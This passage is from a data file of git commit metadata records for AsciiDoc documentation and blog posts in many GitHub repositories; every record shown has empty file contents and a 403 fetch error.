2016-03-24-Microservices-in-the-Chronicle-world-Part-2.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-03-24-Microservices-in-the-Chronicle-world-Part-2.adoc","new_file":"_posts\/2016-03-24-Microservices-in-the-Chronicle-world-Part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c2d257c6624ed18d82601e9e2f5aa4588e97f62","subject":"doc: user-guide: clarify scheduler operation for atomic queues","message":"doc: user-guide: clarify scheduler operation for atomic queues\n\nSigned-off-by: Bill Fischofer <52f3c909d51cc5d355a68a403df6906b3c1a8f83@linaro.org>\nReviewed-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\nSigned-off-by: Mike Holmes <ed44c09f4d7f698f5510adc894a872c73e08c8bd@linaro.org>\n","repos":"dkrot\/odp,erachmi\/odp,dkrot\/odp,dkrot\/odp,erachmi\/odp,ravineet-singh\/odp,erachmi\/odp,mike-holmes-linaro\/odp,nmorey\/odp,nmorey\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,erachmi\/odp,ravineet-singh\/odp,ravineet-singh\/odp,mike-holmes-linaro\/odp,dkrot\/odp,nmorey\/odp,mike-holmes-linaro\/odp,nmorey\/odp","old_file":"doc\/users-guide\/users-guide.adoc","new_file":"doc\/users-guide\/users-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nmorey\/odp.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} 
{"commit":"b6afc8fc4462dfe256429b17bd86e106d503d96d","subject":"Spell check using F6 with ST2","message":"Spell check using F6 with ST2\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"259f5efd296cae76e9c18fecace04f0e640b96ed","subject":"Update 2015-09-23-Daisies-arent-roses.adoc","message":"Update 2015-09-23-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-23-Daisies-arent-roses.adoc","new_file":"_posts\/2015-09-23-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dbfdd2e3caeef2a16f44c4d4f923a40d62cfb71b","subject":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","message":"Update 2016-08-21-What-to-expect-from-this-blog.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_file":"_posts\/2016-08-21-What-to-expect-from-this-blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95785c257868fecbf5466af4364373004441edec","subject":"added README","message":"added README\n","repos":"bsx\/weechat-silc","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bsx\/weechat-silc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"de440a23163d776b9e9199778ad62276dc99530f","subject":"textfield and validation doc","message":"textfield and validation doc","repos":"BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j,BrunoEberhard\/minimal-j","old_file":"doc\/textfield_and_validation.adoc","new_file":"doc\/textfield_and_validation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/BrunoEberhard\/minimal-j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0cda18c166823150a1aa5c8b93b695ecb2e9f917","subject":"create post Using Your Wrist To Power Your Smartphone...","message":"create post Using Your Wrist To Power Your Smartphone...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Using-Your-Wrist-To-Power-Your-Smartphone....adoc","new_file":"_posts\/2018-02-26-Using-Your-Wrist-To-Power-Your-Smartphone....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"343e4e23a4b50c6a137c5ffe4937737cc480e0b7","subject":"add frequently used docs","message":"add frequently used 
docs\n","repos":"gengjiawen\/AndroidHelper,gengjiawen\/AndroidHelper","old_file":"docs\/fix65kMethod.adoc","new_file":"docs\/fix65kMethod.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gengjiawen\/AndroidHelper.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f28e0fbeeccb0d147f66d3e89480cd0252ae217a","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea8a278303625b3284c2b56d57e0b8ac25fe6f01","subject":"Create test.adoc","message":"Create test.adoc","repos":"JR0ch17\/S3Cruze","old_file":"test.adoc","new_file":"test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JR0ch17\/S3Cruze.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47194473150bfbc2a85b3bf73c7e0155b6294cc7","subject":"Update 2015-05-30-Hello-World.adoc","message":"Update 2015-05-30-Hello-World.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-Hello-World.adoc","new_file":"_posts\/2015-05-30-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b6de8dba9904367c295622b639cac7c4b40b025","subject":"Update 2016-05-02-Lonely-road.adoc","message":"Update 2016-05-02-Lonely-road.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-05-02-Lonely-road.adoc","new_file":"_posts\/2016-05-02-Lonely-road.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb8232b307c9cda18597043ad4b6be37ca7b7ba6","subject":"Deleted _posts\/2016-12-03-Hello-World.adoc","message":"Deleted _posts\/2016-12-03-Hello-World.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2016-12-03-Hello-World.adoc","new_file":"_posts\/2016-12-03-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b95884255f06d53c72515bc4e442d47fc8e0323","subject":"Update 2018-06-30-empty-space.adoc","message":"Update 
2018-06-30-empty-space.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2018-06-30-empty-space.adoc","new_file":"_posts\/2018-06-30-empty-space.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d13ac79a46602b135cb7dffcf484c65ccb898099","subject":"docs: updates to kudu_impala_integration.adoc","message":"docs: updates to kudu_impala_integration.adoc\n\nNote that this doc has diverged pretty substantially from its downstream\nCloudera counterpart, which is far more featureful.\n\nChange-Id: I02a91f1c33be3f0d6fbffaef5e03832e21b6db70\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/4138\nTested-by: Kudu Jenkins\nReviewed-by: Alexey Serbin <864f6b82bd94e8dda64141d4274519ee66e0102e@cloudera.com>\nReviewed-by: Dan Burkert <2591e5f46f28d303f9dc027d475a5c60d8dea17a@cloudera.com>\n","repos":"InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"11aaaa31a512b02add5491db6ac6b059377dbbb5","subject":"Update 2016-10-10-Math-Test-1.adoc","message":"Update 2016-10-10-Math-Test-1.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2016-10-10-Math-Test-1.adoc","new_file":"_posts\/2016-10-10-Math-Test-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff412ed4f5a6ce3f85774aa61883aaca2bb64948","subject":"Update 2017-12-03-visual-studio-code-extension.adoc","message":"Update 2017-12-03-visual-studio-code-extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-03-visual-studio-code-extension.adoc","new_file":"_posts\/2017-12-03-visual-studio-code-extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c4211f4a0d4fa7c8559261badff6ff8e6ed416a","subject":"Update 2015-06-14-Znaj-svoj-instrument.adoc","message":"Update 
2015-06-14-Znaj-svoj-instrument.adoc","repos":"miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma,miroque\/shirokuma","old_file":"_posts\/2015-06-14-Znaj-svoj-instrument.adoc","new_file":"_posts\/2015-06-14-Znaj-svoj-instrument.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miroque\/shirokuma.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1c9d12241274ab0cf8cda2d5f0fe08c93763f8c","subject":"render documentation with asciidcotorfy","message":"render documentation with asciidcotorfy\n","repos":"tomitribe\/community","old_file":"mongodb-example\/README.adoc","new_file":"mongodb-example\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tomitribe\/community.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7d83a8304f28c5b081cb5fcb6ca17af7a32a85a0","subject":"Update 2015-06-02-Citrus.adoc","message":"Update 2015-06-02-Citrus.adoc","repos":"yysk\/yysk.github.io,yysk\/yysk.github.io,yysk\/yysk.github.io","old_file":"_posts\/2015-06-02-Citrus.adoc","new_file":"_posts\/2015-06-02-Citrus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yysk\/yysk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84244461d0aa5df1c041869ecbd2d18a0cca7659","subject":"[release_notes] replica management scheme notes","message":"[release_notes] replica management scheme notes\n\nAdded relevant notes on the new replica management scheme used\nin Kudu 1.7 by default:\n * the new replica management scheme is incompatible with old one\n * rolling upgrade 1.6 -> 1.7 is not possible\n\nChange-Id: I49f1f1e17cdaee272592d598431a33dbfe55123f\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/9571\nTested-by: Kudu Jenkins\nReviewed-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@gmail.com>\n","repos":"EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu","old_file":"docs\/release_notes.adoc","new_file":"docs\/release_notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ac94cb0ff6b4ddd9a582368352e9f742532678b8","subject":"Add design doc for broker limits","message":"Add design doc for broker limits\n\nThis fixes 
#967\n","repos":"EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse,EnMasseProject\/enmasse,jenmalloy\/enmasse,jenmalloy\/enmasse","old_file":"documentation\/design_docs\/design\/broker-limits.adoc","new_file":"documentation\/design_docs\/design\/broker-limits.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jenmalloy\/enmasse.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ed1cb346a7024f6b719c3e53ab3401f971c3e3d1","subject":"Publish 2018-2-2-Web-R-T-C.adoc","message":"Publish 2018-2-2-Web-R-T-C.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2018-2-2-Web-R-T-C.adoc","new_file":"2018-2-2-Web-R-T-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8576287b4cb2204342a9729c94d1599284cbee14","subject":"Update 2015-05-12-First-Post.adoc","message":"Update 2015-05-12-First-Post.adoc","repos":"mubix\/blog.room362.com,mubix\/blog.room362.com,mubix\/blog.room362.com","old_file":"_posts\/2015-05-12-First-Post.adoc","new_file":"_posts\/2015-05-12-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mubix\/blog.room362.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40a8f2f1018ff4bb8dee31cb20e6005fbb9ef0fb","subject":"Update 2015-06-18-hello-word.adoc","message":"Update 2015-06-18-hello-word.adoc","repos":"miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io,miplayer1\/miplayer1.github.io","old_file":"_posts\/2015-06-18-hello-word.adoc","new_file":"_posts\/2015-06-18-hello-word.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/miplayer1\/miplayer1.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"730bed965f70acbd3bd3fc4cfc9d6976a5f0765c","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c80a33422eeb5f06429949de6610d1254aea9dfe","subject":"Update 2017-05-22-Quao-Facil-e-criar-um-plugin-para-Native-Script.adoc","message":"Update 
2017-05-22-Quao-Facil-e-criar-um-plugin-para-Native-Script.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-05-22-Quao-Facil-e-criar-um-plugin-para-Native-Script.adoc","new_file":"_posts\/2017-05-22-Quao-Facil-e-criar-um-plugin-para-Native-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"081fc2f5ff96cb59c50edaa8ada22de76a091708","subject":"Update 2015-02-09-Hello-World.adoc","message":"Update 2015-02-09-Hello-World.adoc","repos":"Murazaki\/murazaki.github.io,Murazaki\/murazaki.github.io,Murazaki\/murazaki.github.io,Murazaki\/murazaki.github.io","old_file":"_posts\/2015-02-09-Hello-World.adoc","new_file":"_posts\/2015-02-09-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Murazaki\/murazaki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4058df6ee08fa47bd2870726c59386b86075bea1","subject":"y2b create post Verizon MiFi 4G LTE Unboxing","message":"y2b create post Verizon MiFi 4G LTE Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-01-06-Verizon-MiFi-4G-LTE-Unboxing.adoc","new_file":"_posts\/2012-01-06-Verizon-MiFi-4G-LTE-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b43422ad18474529d5af998fec4d8b806c4e6d1","subject":"Trying to Fix TOC for github etc.","message":"Trying to Fix TOC for github etc.\n","repos":"iGW\/byteport-api,iGW\/byteport-api,iGW\/byteport-api,iGW\/byteport-api","old_file":"demo.adoc","new_file":"demo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iGW\/byteport-api.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"34e48e2c1774ad255aa918bc2c0d37b159e659dc","subject":"added readme","message":"added readme\n","repos":"jexp\/cypher-utils,jexp\/cypher-utils,jexp\/cypher-utils","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jexp\/cypher-utils.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0771152d9edc13c639f537dece2b887f0f5e6a78","subject":"Address comments about glslc doc.","message":"Address comments about glslc doc.\n","repos":"fuchsia-mirror\/third_party-shaderc,dneto0\/shaderc,fuchsia-mirror\/third_party-shaderc,antiagainst\/shaderc,antiagainst\/shaderc,antiagainst\/shaderc,dneto0\/shaderc,dneto0\/shaderc,fuchsia-mirror\/third_party-shaderc,antiagainst\/shaderc,dneto0\/shaderc","old_file":"glslc\/README.asciidoc","new_file":"glslc\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fuchsia-mirror\/third_party-shaderc.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2a56911fc6ea64b51f72d83fea7598e1b2c18eef","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/10\/29\/deref.adoc","new_file":"content\/news\/2021\/10\/29\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"0a4c23859e02d40bc9336f5b46d61e5a8416cc74","subject":"Initial commit for a new readme","message":"Initial commit for a new readme\n","repos":"JoergM\/consul-examples,JoergM\/consul-examples,JoergM\/consul-examples","old_file":"showcase\/readme.adoc","new_file":"showcase\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/JoergM\/consul-examples.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6eafea5d8c323f5c3e9f2a6e4ba9e4a4ae0cc3af","subject":"ClojureScript 1.10.516 Release (#280)","message":"ClojureScript 1.10.516 Release (#280)\n\n","repos":"clojure\/clojurescript-site","old_file":"content\/news\/2019-01-31-release.adoc","new_file":"content\/news\/2019-01-31-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"377a61eb78fbe149288dd3b16096775082413db8","subject":"Update 2017-04-06-Mixin-para-calcular-letter-spacing-de-PS-para-CSS.adoc","message":"Update 2017-04-06-Mixin-para-calcular-letter-spacing-de-PS-para-CSS.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2017-04-06-Mixin-para-calcular-letter-spacing-de-PS-para-CSS.adoc","new_file":"_posts\/2017-04-06-Mixin-para-calcular-letter-spacing-de-PS-para-CSS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b92a0c8d844c8753274b41845eade083e7ce27a","subject":"Renamed '_posts\/2019-01-31-PlaidCTF-2017-Writeup.adoc' to '_posts\/2017-05-01-PlaidCTF-2017-Writeup.adoc'","message":"Renamed '_posts\/2019-01-31-PlaidCTF-2017-Writeup.adoc' to '_posts\/2017-05-01-PlaidCTF-2017-Writeup.adoc'","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-05-01-PlaidCTF-2017-Writeup.adoc","new_file":"_posts\/2017-05-01-PlaidCTF-2017-Writeup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9fba79cbe166a9fafa84fca5e13b76b65e43fc8","subject":"Update 2015-07-16-How-Seque-Works.adoc","message":"Update 2015-07-16-How-Seque-Works.adoc","repos":"skeate\/skeate.github.io,skeate\/skeate.github.io,skeate\/skeate.github.io,skeate\/skeate.github.io","old_file":"_posts\/2015-07-16-How-Seque-Works.adoc","new_file":"_posts\/2015-07-16-How-Seque-Works.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/skeate\/skeate.github.io.git\/': The requested 
URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0118992ba1fd56f5e0c8f90406b3c4155926de6","subject":"Update TODO","message":"Update TODO\n","repos":"spodin\/algorithms","old_file":"TODO.adoc","new_file":"TODO.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spodin\/algorithms.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29e229411b4b4b742fb49cda2301df2c631a87a1","subject":"add drafts","message":"add drafts\n","repos":"lancegatlin\/techblog,lancegatlin\/techblog","old_file":"drafts\/scala-type-classes.asciidoc","new_file":"drafts\/scala-type-classes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lancegatlin\/techblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f50625186ef8db0e72cdd6a19ed297609d59cc04","subject":"Document current state of aktualizr to backend events","message":"Document current state of aktualizr to backend events\n","repos":"advancedtelematic\/aktualizr,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr,advancedtelematic\/sota_client_cpp,advancedtelematic\/aktualizr","old_file":"docs\/ecu_events.adoc","new_file":"docs\/ecu_events.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/advancedtelematic\/sota_client_cpp.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"80aabe2ed356e8813e6f17932ff55c056211fc81","subject":"chore: Add documentation for automated release scripts","message":"chore: Add documentation for automated release scripts\n","repos":"christophd\/citrus-simulator,christophd\/citrus-simulator,christophd\/citrus-simulator,christophd\/citrus-simulator","old_file":"tools\/cli\/README.adoc","new_file":"tools\/cli\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/christophd\/citrus-simulator.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3347342eebd25a83ceecd8a804d672be723e26ae","subject":"Update 2017-06-28-Jewel-P-Lightfoot-Lodge-Special-Guest-David-Bindle.adoc","message":"Update 2017-06-28-Jewel-P-Lightfoot-Lodge-Special-Guest-David-Bindle.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-06-28-Jewel-P-Lightfoot-Lodge-Special-Guest-David-Bindle.adoc","new_file":"_posts\/2017-06-28-Jewel-P-Lightfoot-Lodge-Special-Guest-David-Bindle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9695ae338fc0acd548294d60f15250cd75f85c8","subject":"Add new API specification","message":"Add new API specification\n","repos":"tobbez\/lys-reader","old_file":"doc\/api.asciidoc","new_file":"doc\/api.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tobbez\/lys-reader.git\/': The requested URL returned error: 403\n","license":"isc","lang":"AsciiDoc"} {"commit":"c3b7f13f5117ecb82cfe8bba8352c0d71ee30025","subject":"ispell fix","message":"ispell fix\n\nSigned-off-by: Dan Mack 
